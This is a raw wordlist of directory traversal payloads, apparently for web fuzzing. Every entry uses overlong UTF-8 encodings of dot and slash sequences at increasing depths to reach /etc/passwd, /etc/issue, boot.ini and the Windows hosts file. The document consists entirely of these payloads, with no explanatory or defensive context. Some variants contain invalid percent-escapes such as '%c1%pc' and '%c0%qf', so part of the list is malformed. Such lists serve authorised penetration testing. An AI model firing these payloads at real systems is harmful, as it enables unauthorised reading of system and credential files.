-%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2fetc%c0%2fissue -%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2fboot.ini -%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2fetc%c0%2fpasswd -%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2fetc%c0%2fissue -%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2fboot.ini -%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%%c0%6e%c0%6e%c0%afetc%c0%afpasswd -%%c0%6e%c0%6e%c0%afetc%c0%afissue -%%c0%6e%c0%6e%c0%afboot.ini -%%c0%6e%c0%6e%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%afetc%c0%afpasswd -%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%afetc%c0%afissue -%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%afboot.ini -%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%afetc%c0%afpasswd -%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%afetc%c0%afissue -%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%afboot.ini -%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%afetc%c0%afpasswd -%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%afetc%c0%afissue -%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%afboot.ini -%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%afetc%c0%afpasswd -%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%afetc%c0%afissue -%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%afboot.ini -%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%afetc%c0%afpasswd -%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%afetc%c0%afissue -%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%afboot.ini -%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%af%%c0%6e%c0%6e%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%%c0%6e%c0%6e%c0%5cetc%c0%5cpasswd -%%c0%6e%c0%6e%c0%5cetc%c0%5cissue -%%c0%6e%c0%6e%c0%5cboot.ini -%%c0%6e%c0%6e%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5cetc%c0%5cpasswd -%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5cetc%c0%5cissue -%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5cboot.ini -%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5cetc%c0%5cpasswd -%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5cetc%c0%5cissue -%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5cboot.ini -%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5cetc%c0%5cpasswd -%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5cetc%c0%5cissue -%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5cboot.ini -%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5cetc%c0%5cpasswd -%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5cetc%c0%5cissue -%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5cboot.ini -%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5cetc%c0%5cpasswd -%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5cetc%c0%5cissue -%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5cboot.ini -%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5c%%c0%6e%c0%6e%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%%c0%6e%c0%6e%c1%9cetc%c1%9cpasswd -%%c0%6e%c0%6e%c1%9cetc%c1%9cissue -%%c0%6e%c0%6e%c1%9cboot.ini -%%c0%6e%c0%6e%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9cetc%c1%9cpasswd -%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9cetc%c1%9cissue -%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9cboot.ini -%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9cetc%c1%9cpasswd -%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9cetc%c1%9cissue -%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9cboot.ini -%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9cetc%c1%9cpasswd -%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9cetc%c1%9cissue -%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9cboot.ini -%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9cetc%c1%9cpasswd -%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9cetc%c1%9cissue -%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9cboot.ini -%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9cetc%c1%9cpasswd -%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9cetc%c1%9cissue -%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9cboot.ini -%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9c%%c0%6e%c0%6e%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%%c0%6e%c0%6e%c1%pcetc%c1%pcpasswd -%%c0%6e%c0%6e%c1%pcetc%c1%pcissue -%%c0%6e%c0%6e%c1%pcboot.ini -%%c0%6e%c0%6e%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pcetc%c1%pcpasswd -%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pcetc%c1%pcissue -%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pcboot.ini -%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pcetc%c1%pcpasswd -%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pcetc%c1%pcissue -%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pcboot.ini -%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pcetc%c1%pcpasswd -%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pcetc%c1%pcissue -%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pcboot.ini -%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pcetc%c1%pcpasswd -%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pcetc%c1%pcissue -%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pcboot.ini -%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pcetc%c1%pcpasswd -%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pcetc%c1%pcissue -%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pcboot.ini -%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pc%%c0%6e%c0%6e%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%%c0%6e%c0%6e%c0%9vetc%c0%9vpasswd -%%c0%6e%c0%6e%c0%9vetc%c0%9vissue -%%c0%6e%c0%6e%c0%9vboot.ini -%%c0%6e%c0%6e%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9vetc%c0%9vpasswd -%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9vetc%c0%9vissue -%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9vboot.ini -%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9vetc%c0%9vpasswd -%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9vetc%c0%9vissue -%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9vboot.ini -%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9vetc%c0%9vpasswd -%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9vetc%c0%9vissue -%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9vboot.ini -%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9vetc%c0%9vpasswd -%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9vetc%c0%9vissue -%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9vboot.ini -%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9vetc%c0%9vpasswd -%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9vetc%c0%9vissue -%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9vboot.ini -%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9v%%c0%6e%c0%6e%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%%c0%6e%c0%6e%c0%qfetc%c0%qfpasswd -%%c0%6e%c0%6e%c0%qfetc%c0%qfissue -%%c0%6e%c0%6e%c0%qfboot.ini -%%c0%6e%c0%6e%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qfetc%c0%qfpasswd -%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qfetc%c0%qfissue -%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qfboot.ini -%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qfetc%c0%qfpasswd -%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qfetc%c0%qfissue -%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qfboot.ini -%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qfetc%c0%qfpasswd -%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qfetc%c0%qfissue -%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qfboot.ini -%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qfetc%c0%qfpasswd -%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qfetc%c0%qfissue -%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qfboot.ini -%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qfetc%c0%qfpasswd -%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qfetc%c0%qfissue -%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qfboot.ini -%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qf%%c0%6e%c0%6e%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%%c0%6e%c0%6e%c1%8setc%c1%8spasswd -%%c0%6e%c0%6e%c1%8setc%c1%8sissue -%%c0%6e%c0%6e%c1%8sboot.ini -%%c0%6e%c0%6e%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8setc%c1%8spasswd -%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8setc%c1%8sissue -%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8sboot.ini -%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8setc%c1%8spasswd -%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8setc%c1%8sissue -%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8sboot.ini -%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8setc%c1%8spasswd -%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8setc%c1%8sissue -%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8sboot.ini -%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8setc%c1%8spasswd -%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8setc%c1%8sissue -%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8sboot.ini -%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8setc%c1%8spasswd -%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8setc%c1%8sissue -%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8sboot.ini -%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8s%%c0%6e%c0%6e%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%%c0%6e%c0%6e%c1%1cetc%c1%1cpasswd -%%c0%6e%c0%6e%c1%1cetc%c1%1cissue -%%c0%6e%c0%6e%c1%1cboot.ini -%%c0%6e%c0%6e%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts 